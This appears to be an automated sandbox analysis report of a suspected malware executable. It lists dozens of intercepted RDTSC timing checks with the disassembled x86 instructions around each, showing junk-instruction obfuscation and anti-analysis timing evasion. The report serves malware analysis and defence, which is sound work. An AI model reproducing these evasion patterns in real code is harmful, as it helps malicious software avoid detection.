                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C94F24 second address: C94F30 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F61286B7176h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C94F30 second address: C94F3C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F612923D90Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C9B5BD second address: C9B5C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C9B5C3 second address: C9B61A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D90Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F612923D90Bh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F612923D917h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F612923D914h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C9B61A second address: C9B61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA0FE1 second address: CA0FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA0FE6 second address: CA0FEB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA0FEB second address: CA0FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA157A second address: CA158F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F61286B7176h 0x00000008 jbe 00007F61286B7176h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA158F second address: CA1595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA1595 second address: CA15B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F61286B7186h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA15B4 second address: CA15B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA365A second address: CA3673 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7185h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3673 second address: CA3679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3679 second address: CA369B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 099049B6h 0x0000000f push EFDDBB65h 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007F61286B717Ch 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA369B second address: CA36A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA36A1 second address: CA36A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3BD6 second address: CA3BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D90Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3BE6 second address: CA3BF4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3BF4 second address: CA3BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3CC4 second address: CA3CCA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA42BA second address: CA42C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F612923D906h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA4921 second address: CA4925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA4925 second address: CA492B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA5EC4 second address: CA5ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA5ED0 second address: CA5ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA5ED6 second address: CA5EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA5EDA second address: CA5EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F612923D90Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA655A second address: CA65B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D1970h], ebx 0x00000010 mov esi, ecx 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+12457AB9h], edx 0x0000001a mov dword ptr [ebp+122D18B2h], edx 0x00000020 push 00000000h 0x00000022 mov edi, dword ptr [ebp+122D2A97h] 0x00000028 jnp 00007F61286B717Ch 0x0000002e xchg eax, ebx 0x0000002f ja 00007F61286B7188h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA7E5F second address: CA7E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D90Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA88FE second address: CA895F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F61286B717Bh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F61286B7178h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1844h], ecx 0x00000030 push 00000000h 0x00000032 call 00007F61286B7180h 0x00000037 pop esi 0x00000038 push 00000000h 0x0000003a mov edi, esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F61286B717Eh 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA8664 second address: CA8671 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA950D second address: CA951F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F61286B7196h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAB5FE second address: CAB602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CACFE3 second address: CACFEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F61286B7176h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAEDAF second address: CAEDB9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CABD6F second address: CABD74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF3E2 second address: CAF42D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F612923D915h 0x00000011 popad 0x00000012 popad 0x00000013 push 00000000h 0x00000015 mov bx, 68B5h 0x00000019 push 00000000h 0x0000001b movsx ebx, bx 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007F612923D91Ah 0x00000027 jmp 00007F612923D914h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF627 second address: CAF62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF62B second address: CAF635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB25F2 second address: CB25F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF635 second address: CAF639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF639 second address: CAF64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F61286B7176h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CAF64A second address: CAF64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB2DA7 second address: CB2E27 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F61286B7176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c adc edi, 5A724A82h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr [ebp+122D23E9h], edi 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 sbb edi, 0FA81620h 0x0000002c mov eax, dword ptr [ebp+122D14E1h] 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F61286B7178h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov ebx, dword ptr [ebp+122D2B97h] 0x00000052 push FFFFFFFFh 0x00000054 adc ebx, 4A8D6C08h 0x0000005a nop 0x0000005b jmp 00007F61286B717Ah 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 jmp 00007F61286B717Bh 0x00000068 push edi 0x00000069 pop edi 0x0000006a popad 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB2E27 second address: CB2E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB5A66 second address: CB5A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB4D0E second address: CB4D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB5A6A second address: CB5A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB4D13 second address: CB4D18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB6A08 second address: CB6A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB6A0C second address: CB6AAC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F612923D908h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jmp 00007F612923D90Eh 0x0000002d jno 00007F612923D912h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F612923D908h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f or bx, B65Eh 0x00000054 mov ebx, dword ptr [ebp+122D18C3h] 0x0000005a xor dword ptr [ebp+1245D0EFh], ebx 0x00000060 push 00000000h 0x00000062 mov bx, C700h 0x00000066 xchg eax, esi 0x00000067 pushad 0x00000068 pushad 0x00000069 push ebx 0x0000006a pop ebx 0x0000006b jmp 00007F612923D917h 0x00000070 popad 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB6C49 second address: CB6D0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7187h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F61286B7187h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F61286B7178h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a jc 00007F61286B717Ch 0x00000030 sub dword ptr [ebp+122D3169h], ebx 0x00000036 push dword ptr fs:[00000000h] 0x0000003d jmp 00007F61286B717Eh 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 add dword ptr [ebp+124576F6h], edi 0x0000004f mov eax, dword ptr [ebp+122D0E51h] 0x00000055 call 00007F61286B717Ch 0x0000005a cmc 0x0000005b pop ebx 0x0000005c mov dword ptr [ebp+122D3430h], eax 0x00000062 push FFFFFFFFh 0x00000064 push 00000000h 0x00000066 push esi 0x00000067 call 00007F61286B7178h 0x0000006c pop esi 0x0000006d mov dword ptr [esp+04h], esi 0x00000071 add dword ptr [esp+04h], 00000018h 0x00000079 inc esi 0x0000007a push esi 0x0000007b ret 0x0000007c pop esi 0x0000007d ret 0x0000007e mov bx, si 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 push eax 0x00000087 pop eax 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB6D0F second address: CB6D19 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB9CB1 second address: CB9CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB9CB5 second address: CB9CC0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBBC6F second address: CBBC8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F61286B717Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBBC8A second address: CBBC90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C69CAD second address: C69CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C69CB1 second address: C69CD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F612923D915h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F612923D90Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB8E6C second address: CB8E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CB8E70 second address: CB8E7A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBF12C second address: CBF145 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F61286B7183h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBF145 second address: CBF14C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBF14C second address: CBF155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBF835 second address: CBF83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CBF952 second address: CBF95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F61286B7176h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC0924 second address: CC0928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC0928 second address: CC092E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC293C second address: CC2942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC2942 second address: CC2985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F61286B7176h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 xor dword ptr [ebp+12477C73h], esi 0x00000017 push esi 0x00000018 jo 00007F61286B717Ch 0x0000001e sub edi, 51A65325h 0x00000024 pop ebx 0x00000025 push 00000000h 0x00000027 mov ebx, 699B3AD2h 0x0000002c push 00000000h 0x0000002e and ebx, 45F0E80Dh 0x00000034 push eax 0x00000035 jo 00007F61286B7188h 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007F61286B7176h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC2985 second address: CC2989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC2B47 second address: CC2B6C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F61286B7176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F61286B717Bh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007F61286B7178h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA5B3 second address: CCA601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F612923D912h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F612923D910h 0x00000010 jng 00007F612923D91Eh 0x00000016 jnp 00007F612923D906h 0x0000001c jmp 00007F612923D912h 0x00000021 jl 00007F612923D912h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA601 second address: CCA607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA607 second address: CCA612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC9CF7 second address: CC9D19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Bh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F61286B7181h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC9FA9 second address: CC9FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CC9FAF second address: CC9FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA13C second address: CCA147 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F612923D906h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA147 second address: CCA175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F61286B7176h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F61286B7176h 0x00000017 jmp 00007F61286B7187h 0x0000001c rdtsc
